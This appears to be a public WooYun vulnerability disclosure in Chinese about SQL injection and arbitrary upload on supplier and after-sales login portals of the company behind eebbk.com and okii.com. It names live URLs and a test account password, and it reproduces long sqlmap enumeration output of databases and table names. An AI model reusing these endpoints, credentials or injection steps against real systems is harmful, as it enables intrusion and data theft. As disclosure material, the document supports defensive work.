乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-15: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-29: 厂商已经主动忽略漏洞,细节向公众公开
http://srm.eebbk.com:85/ 供货商登录系统 注册账号,发现一处任意上传,D:\upload\PreVendorProcessFlowDiagramFile\ 但是上传在不是跟web存放位置,无法利用123456a 123456a 测试账号,登录后,查询发现POST注入http://srv.okii.com:8015/Login.aspx 售后交流服务中心登录POST,注入20库 几千万数据都有数据量庞大,走个大厂商啊可惜没突破上传,拿到shell进入内网~~
Database: SRMADMIN[518 tables]+-------------------------------+| PARAMETER || AGENTBRAND || APTITUDEAPPLY || APTITUDEAPPLYITEM || APTITUDEAPPLYLOG || APTITUDEAPPLYVENDOR || APTITUDEESTIMATERECORD || APTITUDEESTIMATEUSER || ASN || ASNDETAIL || ASNDETAIL_20140101 || ASNMESSAGE || ASNPMRECYCLE || ASNPRINTLOG || ASNSTATICDATA || ASN_20140101 || AUDITCHECKER || AUDITDTRESULT || AUDITLOG || AUDITPLAN || AUDITRESULT || AUDITTEMPLATE || AUDITTEMPLATEITEM || AUDITTEMPLATEITEMDT || BATCHRETURNSOURCE || BBKEDU_MINPO_T || BBKEDU_PMS_INVALID || BBKEDU_PMS_INVALID_TEMP || BBKEDU_SRMEF_T || BBKSRM_ADVISE || BIDDER || BIDDERBIDLOG || BIDDERCONFIRMLOG || BIDDERPRICE || BIDHEAD || BIDLOG || BIDMESSAGE || BIDOBJECTS || BIDPARAMETER || BIDPRICE || BIDTIMELINE || BID_APPROVEUSER || BID_CHECKUSER || BILLMESSAGE || BILLSHEETBUYERDTL || BILLSHEETERPDTL || BILLSHEETMASTER || BILLSHEETOADTL || BILLSHEETVENDORDTL || BILL_STREAM || BRANDCERTIFICATE || BRANDCERTIFICATEHIS || BUYER2VENDORUSER || CALENDARDETAIL || CALENDARDETAIL_20130313 || CALENDARHEADER || CATEGORY || CENTUMNGSOURCE || CHANGEORDERSOURCE || CHANGEORDERTARGET || CHECKSHEET || CHECKSHEETDTL || CHECKSHEETLOG || CLAIM || COMMONREPLACEMATERIALVASSIGN || COMPANY || COMPANY2ITEM || COMPANY2USER || COMPANY2VENDOR || COMPANYBILLCODE || COSTANALYSISTEMPLATE || COSTPREDICTION || COSTPREDICTIONCHECKRECORD || COSTPREDICTIONCLASS || COSTPREDICTIONCLASS_CHANGE || COSTPREDICTIONDETAIL || COSTPREDICTIONDETAIL_CHANGE || COSTPREDICTION_CHANGE || COSTPREDICTION_EDIT || COST_FORCAST || DELIVERYREACHSOURCE || DELIVERYREACHSOURCE_TEMP || DEMAND_DIFF || DEMAND_PSS_CHECKINEFFECTQTY || DEMAND_PSS_TEMP || DEMAND_PSS_TEMPPOQTY || DEMAND_PSS_TEMPQTY || DEMAND_PSS_WEIJIEPLANTQTY || DEPARTMENT2USER || DEPRECIATEMIDDLEDATA || DEPRECIATEMIDDLEDATA_TEMP || DEPTAUDITRESULT || DPS || DPSAUTOPROCLOG || DPSMRPRE || DPSUPLOAD || ERPREGISTFORM || ERP_ITEMCLASS || ERP_ITEMCLASS2USER || ERP_VENDOR2SITE || ERP_WIP_WXDIFF || ERP_WXBOM_DETAIL || ERP_WXBOM_DETAIL_T || ERP_WXWIP_HEADERS || ESTIMATECHANGEORDERTARGET || ESTIMATECHECK || ESTIMATECHECKLOG || ESTIMATECONFIRMLOG || ESTIMATECOSTLOG || ESTIMATECOSTREPORT || ESTIMATEGROUP || ESTIMATEHEAD || ESTIMATEITEM || ESTIMATEITEMCLASSMIDDLEDATA || ESTIMATEITEMCLASSREPORT || ESTIMATEITEMMIDDLEDATA || ESTIMATEITEMREPORT || ESTIMATEITEMSETLOG || ESTIMATEITEMSETREPORT || ESTIMATELOG || ESTIMATEMOULDDETAIL || ESTIMATEMOULDQUODETAIL || ESTIMATEPARAMETER || ESTIMATEPURCHASEMIDDLEDATA || ESTIMATEQUOTECONFIRM || ESTIMATEQUOTELOG || ESTIMATEQUOTEPRICE || ESTIMATERISKHISTORY || ESTIMATERISKITEMCLASSREPORT || ESTIMATERISKITEMREPORT || ESTIMATETIMELINE || ESTIMATEUSER || ESTIMATEUSERLOG || ESTIMATEVENDOR || ESTIMATEVENDORCONFIRMLOG || ESTIMATEVENDORRECEIPTLOG || ESTIMATEVENDORRISKREPORT || ESTIMATE_CANCELITEM || ESTIMATE_DEPRECIATEMIDDLEDATA || FINACIALINFOCHANGEREQUEST || FLOWDEFINE || FLOWLEVELDESC || FLOWSIGNMEMBER || FND_USER || FORMDETAIL || FORMHEAD || FORMHEAD_2015 || FORMLINEDETAIL || FROZENVENDOR || FUNC || FUNCUG2FUNC || FUNCUG2USER || FUNCUSERGROUP || GT$_ESTIMATECOST_VENDORPRICE || GT$_ESTIMATE_PURCHASEPRICE || GT$_ITEMSET_PURCHASEPRICE || GT$_PERF_PURCHASEPRICE || GT$_PERF_PURCHASEPRICE_TEMP || GT$_PROFORECAST_CALC || GT$_S_PUR_SS_CALC || GT$_S_PUR_SS_RATING || IMPROVEMEASURES || IMPROVEREPLY || INDUCTANCECOSTTEMPLATE || INV || INVALIDHIS || INVENTORYCHECK_DETAIL || INVENTORYCHECK_HEAD || INV_TEST || ITEM || ITEMCLASSMIDDLEDATA || ITEMCONFIRM || ITEMCONFIRMDT || ITEMINVENTORYMANAGE || ITEMMIDDLEDATA || ITEMSERIES || ITEMSERIESDETAIL || ITEMSETDEPRECIATEMIDDLEDATA || JOBCENTER || JOBCENTERLOG || JOBCENTERPERIOD || LINECOSTTEMPLATE || LOGDPS || LOGDPSMR || LOGDPSMRPRE || LOGMRDEMAND || LOGMRDEMAND2USER || LOGMRDEMANDASSIGN || LOGTRANSACTION || MACHINE_BOM || MESSAGE || MESSAGEATTACHMENT || MESSAGEREVEIVER || MRDEMAND || MRDEMANDSCHEDULE || MRDEMANDSCHEDULEACTIONHIS || MRDEMANDSCHEDULEHIS || MRDEMANDSCHEDULEMASTER || MRDEMANDSCHEDULE_20140318 || MRDEMANDSCHEDULE_20140319 || MRDEMANDSCHEDULE_20140909 || MRDEMANDSCHEDULE_20150101 || MRDEMANDSCHEDULE_BAK || MRDEMANDSCHEDULE_BBK_COUNT || MRDEMANDSCHEDULE_BYDAY || MRDEMANDSCHEDULE_OP_COUNT || MRDEMAND_TEST || MRITEMGROUP || MRITEMGROUPDETAIL || MTL_CATEGORIES_B || NEWVENDORBASEDEATAIL || NEWVENDORRGS || NEW_ITEM || OA_ASNIQC_RESULT || OA_BOMECN_CHANGE || OA_SRM_VENDOR_FIXINV_TBL || ORDERDETAIL || ORDERDETAIL_HIS || ORDERLOG || ORDERMESSAGE || ORDERPRICEANALYTICS || ORDERQUALIFIEDSOURCE || OUTSOURCE_DETAIL || OUTSOURCE_MAIN || OUTSTROE_INFORMATION || OUTVENDOR_ASNSCHEDULE || OUT_ENGBOOK || OUT_TELECTDOCUMENT || OUT_WORKEXCEPTION || PAYPLANDETAIL || PAYPLANSUMMARY || PCBORDER || PCB_ORDER || PERFCHECK || PERFCHECK2ITEMCLASS || PERFCHECKAPPROVE || PERFCHECKAUTOCALCULATE || PERFCHECKLOG || PERFCHECKMEMBER || PERFCHECKNORMAL || PERFCHECKREPORT || PERFCHECKRESULT || PERFCHECKTARGET || PERFDETAILTARGET || PERFGROUP || PERFGROUP2DTARGET || PERFGROUP2ITEMCLASS || PERFGROUP2NTARGET || PERFGROUP2USER || PERFGROUP2VENDOR || PERFITEMCLASSREPORT || PERFITEMREPORT || PERFLEVEL || PERFLEVELTEMPLATE || PERFNORMALCHECK || PERFNORMALTARGET || PERFOACOMPLAIN || PERFRETURNRATE || PERFSCORESCALE || PERFSCORESCALE2ITEMCLASS || PERFSCORESCALEDETAILS || PERFTEMPLATE || PERFTEMPLATEDITEM || PERFTEMPLATEDNORMAL || PERFTEMPLATEDOPTION || PERFTEMPLATEMITEM || PERFVENDORDR || PERFVENDORQCR || PERFVENDORQCROEM || PERFVENDORRISKHISTORY || PERFVENDORRISKITEMCLASSREPORT || PERFVENDORRISKITEMREPORT || PERFVENDORRISKREPORT || PERFVENDORTYPE || PERFVENDORTYPE2VENDOR || PERF_PURCHASEPRICE2013 || PLANT || PLANT2ITEM || PLANT2USER || PLANT2VENDOR || PLANT2VENDOR_TEMP || PLANTITEM2VENDOR || PLANTITEMVASSIGN || PLANTITEMVASSIGNDETAIL || PORTALMESSAGE || PORTALMESSAGETO || PORTALNOTICE || PORTALNOTICE2USER || PORTALNOTICELOG || PORTALNOTICEVIEWLOG || PRDETAIL || PREFMANCE_PAYMENT || PREF_VENDORCODERATE || PREF_VENDORCODERATE_HIS || PREVENDORAGENT || PREVENDORCERTIFICATE || PREVENDORCONTACTINFO || PREVENDORCUSTOMER || PREVENDORDT || PREVENDORLOG || PREVENDORPRODUCTIONSCALE || PREVENDORSAPINFO || PREVENDORSUPPLYSCOPE || PREVENDOR_SRM || PRICE2ITEM || PRICE2VENDOR || PRICEDEPRECIATESOURCE || PRICEDEPRECIATESOURCE_TEMP || PRICEFORM || PRICEFORMDETAIL || PRICEFORMDETAIL_2015 || PRICEFORM_2015 || PRICEFORM_BAK0315 || PRICEFORM_VENDOR || PRICEVENDORNAME || PRICE_USER_CLASS || PROFILE || PROFILEDT || PROFORECAST || PROFORECASTDETAIL || PROFORECASTHEAD || PROFORECASTMESSAGE || PROFORECASTMODIFY || PROFORECASTPOREPORT || PROFORECASTPOREPORT_20140301 || PROFORECASTPOUPLOAD || PROFORECASTREPORT || PROFORECASTREPORT_20140301 || PROFORECASTREPORT_WRITE_T || PROFORECASTUPLOAD || PROFORECAST_D || PROFORERELATION || PURCHASEPRICEMIDDLEDATA || PURCHASEPRICESOURCE || PURCHORDER || PURCHORDER_HIS || PURCHUG2USER || PURCHUSERGROUP || QI8DREPORT || QUALIFIEDVENDOR || QUALIFIEDVENDOR2ITEM || QUALIFIEDVENDOR2ITEMCLASS || QUALITYIMPROVEMENT || QUALITYIMPROVEMENTDT || RD_COSTLIST || REPLACEMATERIALVASSIGN_NT || RETURNEDNOTE || RETURNEDNOTEDTL || ROLEUG2USER || ROLEUSERGROUP || SAMPLEINSP || SAMPLEINSPDT || SAMPLENOTE || SAMPLENOTEDT || SAMPLENOTICEHEADER || SAMPLEREQUESTHEADER || SAMPLEREQUESTLOG || SAMPLEREQUESTRESULT || SAMPLEREQUESTVENDOR || SCHEDULEMODIFYREASON || SORBASEITEM || SORBASEITEMATTRIBUTE || SORBASEITEMPRICE || SORCOMPAREPRICE || SORPRICESYSTEM || SORQUODETAILBASE || SORQUODETAILCARTONBOX || SORQUODETAILCOMMON || SORQUODETAILHOLDER || SORQUODETAILMETAL || SORQUODETAILNORMAL || SORQUODETAILOEM || SORQUODETAILWIRES || SORQUOOEM || SORQUOTATION || SORRFQ || SORRFQ2NORMALITEM || SORRFQ2VENDOR || SORRFQOEM || SQLN_EXPLAIN_PLAN || SRM_TEST_T || SS_CALC_ITEM_ERROR || STOCKDATA || STOCKREPORT || STOCKROWDATA || STOCKROWDATALOG || SUBMENUDETAIL || SUPPLIERCOUNSELING || SYSUSER || TBL_ASN_DATA || TBL_ASN_STATUS || TBL_BALANCE_DATA || TBL_BATCH_RETURN || TBL_BOMPRICEBAK || TBL_BOM_DATA || TBL_BOM_DATA_DT || TBL_CENTUM_NG || TBL_CHANGE_ORDER || TBL_CHECKSHEET_STATUS || TBL_CHECK_AMOUNT || TBL_CHECK_AMOUNT_DT || TBL_CHECK_INVOICE || TBL_CHECK_MANAGER || TBL_DELIVERY_REACH || TBL_DEMAND_LOG || TBL_ERP_BILLSHEET || TBL_ERROR_MESSAGE || TBL_ESTIMATEITEM_PRICE || TBL_FILALE_ORDER || TBL_FINACIALINFO_TRANSFER || TBL_FIRSTVENDOR || TBL_FORECAST_DATA || TBL_GROUP_DATA || TBL_INTERFACE_HIS || TBL_INTERFACE_LOG || TBL_INTERFACE_PARAMETER || TBL_INV_DATA || TBL_IQC || TBL_ITEMATTRIBUTE_DATA || TBL_ITEMCLASS || TBL_ITEMCLASS2USER || TBL_ITEMCONFIRM || TBL_ITEMCONFIRM_DT || TBL_ITEMTECHDOC_LOG || TBL_ITM_DATA || TBL_ITM_FACTORY || TBL_MRDEMANDSCHEDULE_TEMP || TBL_MRP_DATA || TBL_NEWVENDOR_RST || TBL_OAPROFORECAST_DATA || TBL_OA_BILLSHEET || TBL_OA_BILLSHEET_D || TBL_OA_COMPLAIN || TBL_OA_ITEM_PRICE || TBL_ORDER_DPS || TBL_ORDER_QUALIFIED || TBL_ORG_DATA || TBL_PAYPLAN || TBL_PAYPLAN_FINISHED || TBL_PLANASNEXCEPTION || TBL_PO || TBL_POFORECAST_AUTO || TBL_PO_DT || TBL_PO_DT_TEST || TBL_PO_TEST || TBL_PRDETAIL_DATA || TBL_PRICE_DEPRECIATE || TBL_PURCHASE_PRICE || TBL_RETURN_DATA || TBL_RETURN_TRANS || TBL_RETURN_TRANS_MANAGER || TBL_RISKSCORE || TBL_SECONDVENDOR || TBL_SUPPLY_DATA || TBL_SUPPLY_DATA_DT || TBL_SUPPLY_ITM || TBL_SUPPLY_PERCENT || TBL_SUPPLY_PERCENT_DT || TBL_SYSTEM_VALUE || TBL_UNIT_CHANGE || TBL_VENDOR2SITE || TBL_VENDORINFO_TRANSFER || TBL_VENDORRISKCONTROL_DATE || TBL_VENDORRISKDOC_DATA || TBL_VENDOR_BALANCE || TBL_VENDOR_DR || TBL_VENDOR_INV || TBL_VENDOR_INVTRANS || TBL_VENDOR_QCR || TBL_VENDOR_REVISE || TECHNOLOGYDOC || TEMP_ACCOUNT || TMP_BILLSHEET || TMP_EPP || TMP_ORDERDETAIL_HIS || TMP_REMOVE_MRDS || TMP_VENDOR_ACCOUNT || TODOLIST || UBS_CAS_PRICEFORM2 || UBS_CAS_PRICEFORMBATCH || UPLOADFILES || VASSIGNFORM || VASSIGNFORMDETAIL || VENDOR2SITE || VENDOR2USER || VENDORAUDIT || VENDORAUDITTEMPLATE || VENDORBALANCE || VENDORCERTIFICATIONFORM || VENDORCERTITEMCLASS || VENDORIMPROVE || VENDORINV || VENDORINVENTORY || VENDORINVROWDATA || VENDORINVSTATISTIC || VENDORINVTRANS || VENDORISSUEIMPDETAILS || VENDORISSUEIMPROVEMENT || VENDORITEMPRICE || VENDORLOG || VENDORMATERIALRETURN || VENDORRISKDOC || VENDORSAMPLEINSP || VENDORSAMPLEINSPDT || VENDORSAMPLENOTE || VENDORSAMPLENOTEDT || VENDORTAXRATE || VENDORTYPE || VENDORVASSIGNBATCH || VENDOR_BACKDECRIPTION || VENDOR_BACKLIST || VENDOR_ERP || VENDOR_INVENTORY_COMPARE || VENDOR_INVOICE_CHECK || VENDOR_TEL || WARNING_ITEM_VENDORINV || XXDBA_FAIL_JOB || XXDBA_INTERFACE_JOB |+-------------------------------+[10:34:34] [INFO] fetched data logged to text files under 'C:\Users\KING\.sqlmap\output\srm.eebbk.com'available databases [20]:[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] INFOCENTER[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SRMADMIN[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDB
第一处注射信息
available databases [19]:[*] APEX_030200[*] APPQOSSYS[*] APPS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDB[11:01:30] [INFO] fetched data logged to text files under 'C:\Users\KING\.sqlmap\output\srv.okii.com'Database: APPS[325 tables]+--------------------------------+| AA || AAA || BBKDW_YDROLE || BBK_FEEDBACK_QUALITYANALYSE || BBK_FEEDBACK_QUALITYMESSAGE || BBS_AUTO_DWFK || BBS_BBKDW_ROLE || BBS_BBS_HUIFU || BBS_CALLCENTERJDAL_LOG || BBS_CALL_HUIFU || BBS_CASE_HUIFU || BBS_CENTER_BAXX || BBS_CENTER_BAXX_OLD || BBS_CENTER_BBS || BBS_CENTER_CALL || BBS_CENTER_CALL_OLD || BBS_CENTER_CALL_OLD20150518 || BBS_CENTER_CASE || BBS_CENTER_CASE_OLD || BBS_CENTER_HUIFU || BBS_CENTER_ORDER || BBS_CENTER_ORDER_OLD || BBS_CENTER_TSTYPE || BBS_CENTER_YHYJ || BBS_CENTER_YHYJ_OLD || BBS_CENTER_YXORDER || BBS_CLTYPE_FANGAN || BBS_CLTYPE_FANGAN_OLD || BBS_CSP_LOGIN || BBS_CUSTOMER_TS || BBS_CUSTOMER_ZY || BBS_CUSTOMER_ZY_OLD || BBS_FAMILY_HUIFU || BBS_FAMILY_JF || BBS_FAMILY_ORDER || BBS_FAMILY_ORDER_OLD || BBS_FAULT_CODE || BBS_KSTYPE_CL || BBS_KSTYPE_CL_OLD || BBS_LEARN_ORDER || BBS_MAIN_ORDER || BBS_MAIN_ORDER_OLD || BBS_RENDINGTYPE || BBS_SERVICEFILE || BBS_SERVICEFILE_OLD || BBS_SERVICE_FAULT || BBS_SERVICE_FAULT_HUIFU || BBS_SERVICE_HUIFU || BBS_SERVICE_LOG || BBS_SERVICE_ORDER || BBS_SERVICE_ORDER_OLD || BBS_SHOP || BBS_SHOP_OLD || BBS_STEAD || BBS_SYSADMINFILE || BBS_SYSADMINFILE_LOOK || BBS_TSTYPE || BBS_T_YXCL || BBS_USER || BSPRODUCT || BSS_KEY || CSS_AGENT_MAPPING || CSS_AGENT_STOCKS_DAILY || CSS_ANALYSIS_MACHINE_CONDITION || CSS_ANALYSIS_MACHINE_CWO || CSS_ANALYSIS_MACHINE_IMEI || CSS_ANALYSIS_MACHINE_MESS || CSS_ANALYSIS_MACHINE_ORDER || CSS_ANTI_CODE || CSS_ANTI_CODES || CSS_ANTI_CSSCODE_TEMP || CSS_ANTI_SHIP || CSS_ANTI_SHIPORDER || CSS_APPEAL || CSS_APPLY_ITEM || CSS_ASSETS_PART_D || CSS_ASSETS_PART_M || CSS_AUTO_WORKNO || CSS_BADPART_HISTORY || CSS_BARCODE_SCAN || CSS_BBKFENRPT_ALL || CSS_BBKREPORT_ALL || CSS_BBKRPT_ALL || CSS_BBKTELRPT_ALL || CSS_BOM_D || CSS_BOM_M || CSS_BOM_SUB || CSS_BSPRODUCT_TEMP || CSS_BUYER_ADVISE || CSS_BUYER_ADVISE_ALL || CSS_CALL_DISSATISFIED_MEMO || CSS_CALL_HEADER || CSS_CALL_HEADER_OLD201505 || CSS_CALL_LINE || CSS_CALL_LINE_OLD201505 || CSS_CALL_MAXNUM || CSS_CALL_REASON || CSS_CALL_REASON_OLD201505 || CSS_CALL_SPECIAL_MATERIALS || CSS_CHARGES_ORG || CSS_CHECKITEM_D || CSS_CHECKITEM_D_OLD201505 || CSS_CHECKITEM_M || CSS_CHECKITEM_M_OLD201505 || CSS_CHECKORDER || CSS_CHECK_CONKOUT || CSS_CODE || CSS_CODE_D || CSS_CODE_M || CSS_CODE_TEMP || CSS_COMMON_ITEM || CSS_COMPARE || CSS_CONKOUT || CSS_CONKOUT_OLD201505 || CSS_CONKOUT_USER || CSS_COUNTING_DETAILS || CSS_COUNTING_DIFFC || CSS_COUNTING_DIFFM || CSS_COUNTING_ITEMS || CSS_COUNTING_PLANS || CSS_COUNTING_SITE_DETAILS || CSS_COUNTING_SITE_ITEMS || CSS_COUNTING_SITE_PLANS || CSS_CUSTOMER || CSS_CUSTOMER_NAIRE || CSS_CUSTOMER_OLD || CSS_CUSTOMER_ORG_MAPPING || CSS_CUSTOMER_RELATION || CSS_CUSTOM_PRIACE_D || CSS_CUSTOM_PRIACE_D_BAK || CSS_CUSTOM_PRIACE_M || CSS_DEFICIENCY_FAILURE || CSS_DEFICIENCY_MATERIAL || CSS_ERP_MATERIAL_RETURN || CSS_ERP_MATERIAL_TRANCTION || CSS_EXCHANGE || CSS_FAULT_CODE || CSS_FITTINGSALES_D || CSS_FITTINGSALES_D_OLD201505 || CSS_FITTINGSALES_M || CSS_FITTINGSALES_M_OLD201505 || CSS_FITTINGSALES_RETURN_D || CSS_FITTINGSALES_RETURN_D_OLD || CSS_FITTINGSALES_RETURN_M || CSS_FITTINGSALES_RETURN_M_OLD || CSS_FIXED_ASSETS || CSS_FORECASE_D || CSS_FORECASE_M || CSS_FORECASE_ORDER || CSS_FORECAST_CYCLE || CSS_FORECAST_NUM || CSS_FORECAST_PARAMETER || CSS_FORECAST_PRICE || CSS_FORECAST_TEMP || CSS_GROUP_TASK || CSS_HISTORY_NODE || CSS_ID_TEMP || CSS_INSTEAD_ITEM || CSS_INSTEAD_ITEM_BAK || CSS_INV || CSS_INVADJUST_D || CSS_INVADJUST_D_OLD201505 || CSS_INVADJUST_M || CSS_INVADJUST_M_OLD201505 || CSS_INVENTORY || CSS_INVENTORY_BADPART || CSS_INV_TRANSFER_D || CSS_INV_TRANSFER_M || CSS_ITEMS || CSS_ITEMS_CHARGES || CSS_ITEMS_MINV || CSS_ITEMS_PRIACE_D || CSS_ITEMS_PRIACE_D_OLD || CSS_ITEMS_PRIACE_M || CSS_ITEMS_RELATIONS || CSS_ITEM_FJ || CSS_ITEM_LOT || CSS_ITEM_LOT_OLD || CSS_ITEM_NO || CSS_ITEM_START1000 || CSS_ITEM_SUB || CSS_LEVEL || CSS_LEVEL_PARA || CSS_LIQUIDATE_D || CSS_LIQUIDATE_M || CSS_LOG || CSS_MAINMENU || CSS_MAINMENU_SERVICE || CSS_MESSAGE_CALLBACK || CSS_MESSAGE_CONTENT || CSS_MESSAGE_HISTORY || CSS_MESSAGE_HISTORY_NEW || CSS_MESSAGE_SOLUTION || CSS_PART || CSS_PART_D || CSS_PART_D_OLD201505 || CSS_PART_M || CSS_PART_M_OLD201505 || CSS_PART_OLD201505 || CSS_PART_TIMEOUT || CSS_PENDING_TASK || CSS_PENDING_TASK_QUERY || CSS_PENDING_TASK_QUERY_TEMP || CSS_PRICE || CSS_PRICE_HISTORY || CSS_QUESTIONNAIRE || CSS_QUESTIONNAIRE_DETAILS || CSS_QUESTIONNAIRE_DETAILS_BAK || CSS_QUESTIONNAIRE_FLOW || CSS_QUESTIONS || CSS_QUESTIONS_ANSWER || CSS_QUESTION_ANSWER_TEMP_NEW || CSS_RECPART_D || CSS_RECPART_D_OLD201505 || CSS_RECPART_M || CSS_RECPART_M_OLD || CSS_RECPART_M_OLD201505 || CSS_REPOSITORY || CSS_REPOSITORY_FAULT || CSS_REPOSITORY_MANUAL || CSS_REPOSITORY_USE || CSS_RESERVATION_WORK_ORDER || CSS_RETURN_BADPART || CSS_RETURN_BADPART1 || CSS_RETURN_BADPART_OLD201505 || CSS_RETURN_BADPART_T || CSS_RETURN_D || CSS_RETURN_DIFFERENCE || CSS_RETURN_DIFFERENCE_OLD2015 || CSS_RETURN_D_OLD201505 || CSS_RETURN_M || CSS_RETURN_M_OLD201505 || CSS_RETURN_NO || CSS_SALE_IMPORT_D || CSS_SALE_IMPORT_M || CSS_SELF_COUNT_D || CSS_SELF_COUNT_M || CSS_SERVICE_PERSONNEL || CSS_SERVICE_PERSONNEL_BAK || CSS_SERVICE_PERSONNEL_HISTORY || CSS_SERVICE_SITE || CSS_SERVICE_SITE_ALTER || CSS_SERVICE_SITE_HISTORY || CSS_SERVICE_SITE_INFO || CSS_SERVICE_TOOLS || CSS_SITE_BOOK_PARAM || CSS_SLOWMOVING || CSS_SOFTWARE_VERSION || CSS_SPECIAL_BARCODE || CSS_SPECIAL_BARCODE_TMP || CSS_SPECIAL_ITEM_RETURN || CSS_SUB_ITEM || CSS_SUIT_D || CSS_SUIT_M || CSS_SYSROLES || CSS_SYSUSER || CSS_TRANSACTION || CSS_TRANSACTION_HISTORY || CSS_TRANSACTION_OLD201505 || CSS_TRANSACTION_T || CSS_TRANSACTION_TEMP1 || CSS_TX || CSS_USER_LOGIN || CSS_USER_MAC || CSS_VERSION || CSS_VISITOR_GROUP || CSS_VISITOR_PERSONNEL || CSS_WORK_BACK_D || CSS_WORK_BACK_M || CSS_WORK_BADPART || CSS_WORK_BADPART_OLD201505 || CSS_WORK_CHARGE || CSS_WORK_CHARGES || CSS_WORK_CUSTOMER_IMP_BARCODE || CSS_WORK_CUSTOMER_IMP_CODE || CSS_WORK_FLAG || CSS_WORK_IMEIINFO || CSS_WORK_IMEIINFO_OLD || CSS_WORK_IMEIINFO_TMP || CSS_WORK_NOTE || CSS_WORK_NOTE_DETAIL || CSS_WORK_ORDER || CSS_WORK_ORDER_ALERT || CSS_WORK_ORDER_NO || CSS_WORK_ORDER_OLD || CSS_WORK_ORDER_OLD201505 || CSS_WORK_ORDER_OLD201505_DEL || CSS_WORK_PRINT || CSS_WORK_RETURN_D || CSS_WORK_RETURN_D_OLD201505 || CSS_WORK_RETURN_M || CSS_WORK_RETURN_M_OLD201505 || CSS_WX_BOM_ITEM || CSS_WX_MESSAGE || CSS_WX_WORK_ORDER_EVALUATION || CST_ITEM_COSTS_BBK1 || CST_ITEM_COSTS_BK0704 || CST_ITEM_COST_DETAILS_BK0704 || CST_LAYER_COST_DTLS_BK0704 || CST_QUANTITY_LAYERS_BK0704 || ISFIRSTPRINT || ITEM_CONVERT || ITEM_CONVERT_01 || KCH || KCH1 || KCH_YC || MTL_ITEM_LOCATIONS_KFV || MWO_SUM_TEMP || PRINTKIND || REPEATEDRECORDSDELETE || SIJI_TEST || SYS_PERSONNEL || SYS_WORK_ALTER1_HUIFU || SYS_WORK_HUIFU || SYS_WORK_ORDER || SYS_WORK_ORDER_ALTER1 || T || TEMP_ITEM_SPS || V_GDZC_ORDER || V_GDZC_SCRAP_ORDER || YYH || YYH_ADJUST || YYH_SITE || AAAAAAA1 || BBBB |+--------------------------------+[11:07:31] [INFO] fetched data logged to text files under 'C:\Users\KING\.sqlmap\output\srv.okii.com'
第二处注射涉及信息
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
